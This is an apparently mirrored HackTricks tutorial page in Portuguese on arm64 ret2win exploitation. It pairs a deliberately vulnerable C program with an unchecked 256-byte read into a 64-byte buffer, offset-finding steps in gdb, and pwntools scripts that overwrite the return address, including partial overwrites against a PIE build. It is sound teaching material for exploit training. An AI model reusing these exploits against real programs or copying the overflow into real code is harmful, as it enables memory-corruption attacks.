mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-22 11:03:24 +00:00
193 lines
6.5 KiB
Markdown
193 lines
6.5 KiB
Markdown
|
# Ret2win - arm64
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
|
||
|
Outras maneiras de apoiar o HackTricks:
|
||
|
|
||
|
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
|
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||
|
|
||
|
</details>
|
||
|
|
||
|
Encontre uma introdução ao arm64 em:
|
||
|
|
||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||
|
{% endcontent-ref %}
|
||
|
|
||
|
## Código 
|
||
|
```c
|
||
|
#include <stdio.h>
|
||
|
#include <unistd.h>
|
||
|
|
||
|
void win() {
|
||
|
printf("Congratulations!\n");
|
||
|
}
|
||
|
|
||
|
void vulnerable_function() {
|
||
|
char buffer[64];
|
||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||
|
}
|
||
|
|
||
|
int main() {
|
||
|
vulnerable_function();
|
||
|
return 0;
|
||
|
}
|
||
|
```
|
||
|
Compile sem pie e canary:
|
||
|
```bash
|
||
|
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
|
||
|
```
|
||
|
## Encontrando o deslocamento
|
||
|
|
||
|
### Opção de padrão
|
||
|
|
||
|
Este exemplo foi criado usando [**GEF**](https://github.com/bata24/gef):
|
||
|
|
||
|
Inicie o gdb com o gef, crie um padrão e use-o:
|
||
|
```bash
|
||
|
gdb -q ./ret2win
|
||
|
pattern create 200
|
||
|
run
|
||
|
```
|
||
|
<figure><img src="../../../.gitbook/assets/image (1202).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
arm64 tentará retornar para o endereço no registro x30 (que foi comprometido), podemos usar isso para encontrar o deslocamento do padrão:
|
||
|
```bash
|
||
|
pattern search $x30
|
||
|
```
|
||
|
<figure><img src="../../../.gitbook/assets/image (1203).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
**O deslocamento é 72 (9x48).**
|
||
|
|
||
|
### Opção de deslocamento da pilha
|
||
|
|
||
|
Comece obtendo o endereço da pilha onde o registro pc está armazenado:
|
||
|
```bash
|
||
|
gdb -q ./ret2win
|
||
|
b *vulnerable_function + 0xc
|
||
|
run
|
||
|
info frame
|
||
|
```
|
||
|
<figure><img src="../../../.gitbook/assets/image (1204).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
Agora defina um breakpoint após o `read()` e continue até que o `read()` seja executado e defina um padrão como 13371337:
|
||
|
```
|
||
|
b *vulnerable_function+28
|
||
|
c
|
||
|
```
|
||
|
<figure><img src="../../../.gitbook/assets/image (1205).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
Encontre onde este padrão está armazenado na memória:
|
||
|
|
||
|
<figure><img src="../../../.gitbook/assets/image (1206).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
Então: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
|
||
|
|
||
|
<figure><img src="../../../.gitbook/assets/image (1207).png" alt="" width="339"><figcaption></figcaption></figure>
|
||
|
|
||
|
## Sem PIE
|
||
|
|
||
|
### Regular
|
||
|
|
||
|
Obtenha o endereço da função **`win`**:
|
||
|
```bash
|
||
|
objdump -d ret2win | grep win
|
||
|
ret2win: file format elf64-littleaarch64
|
||
|
00000000004006c4 <win>:
|
||
|
```
|
||
|
Exploração:
|
||
|
```python
|
||
|
from pwn import *
|
||
|
|
||
|
# Configuration
|
||
|
binary_name = './ret2win'
|
||
|
p = process(binary_name)
|
||
|
|
||
|
# Prepare the payload
|
||
|
offset = 72
|
||
|
ret2win_addr = p64(0x00000000004006c4)
|
||
|
payload = b'A' * offset + ret2win_addr
|
||
|
|
||
|
# Send the payload
|
||
|
p.send(payload)
|
||
|
|
||
|
# Check response
|
||
|
print(p.recvline())
|
||
|
p.close()
|
||
|
```
|
||
|
<figure><img src="../../../.gitbook/assets/image (1208).png" alt="" width="375"><figcaption></figcaption></figure>
|
||
|
|
||
|
### Fora por 2
|
||
|
|
||
|
Em vez de sobrescrever todo o endereço de retorno, vamos sobrescrever **apenas os últimos 2 bytes** com `0x06c4`.
|
||
|
```python
|
||
|
from pwn import *
|
||
|
|
||
|
# Configuration
|
||
|
binary_name = './ret2win'
|
||
|
p = process(binary_name)
|
||
|
|
||
|
# Prepare the payload
|
||
|
offset = 72
|
||
|
ret2win_addr = p16(0x06c4)
|
||
|
payload = b'A' * offset + ret2win_addr
|
||
|
|
||
|
# Send the payload
|
||
|
p.send(payload)
|
||
|
|
||
|
# Check response
|
||
|
print(p.recvline())
|
||
|
p.close()
|
||
|
```
|
||
|
<figure><img src="../../../.gitbook/assets/image (1209).png" alt="" width="375"><figcaption></figcaption></figure>
|
||
|
|
||
|
## Com PIE
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Compile o binário **sem o argumento `-no-pie`**
|
||
|
{% endhint %}
|
||
|
|
||
|
### Off-by-2
|
||
|
|
||
|
Sem um vazamento, não conhecemos o endereço exato da função vencedora, mas podemos saber o deslocamento da função a partir do binário e sabendo que o endereço de retorno que estamos sobrescrevendo já está apontando para um endereço próximo, é possível vazar o deslocamento para a função de vitória (**0x7d4**) neste caso e simplesmente usar esse deslocamento:
|
||
|
|
||
|
<figure><img src="../../../.gitbook/assets/image (1210).png" alt="" width="563"><figcaption></figcaption></figure>
|
||
|
```python
|
||
|
from pwn import *
|
||
|
|
||
|
# Configuration
|
||
|
binary_name = './ret2win'
|
||
|
p = process(binary_name)
|
||
|
|
||
|
# Prepare the payload
|
||
|
offset = 72
|
||
|
ret2win_addr = p16(0x07d4)
|
||
|
payload = b'A' * offset + ret2win_addr
|
||
|
|
||
|
# Send the payload
|
||
|
p.send(payload)
|
||
|
|
||
|
# Check response
|
||
|
print(p.recvline())
|
||
|
p.close()
|
||
|
```
|
||
|
<details>
|
||
|
|
||
|
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
|
||
|
Outras maneiras de apoiar o HackTricks:
|
||
|
|
||
|
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
||
|
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||
|
|
||
|
</details>
|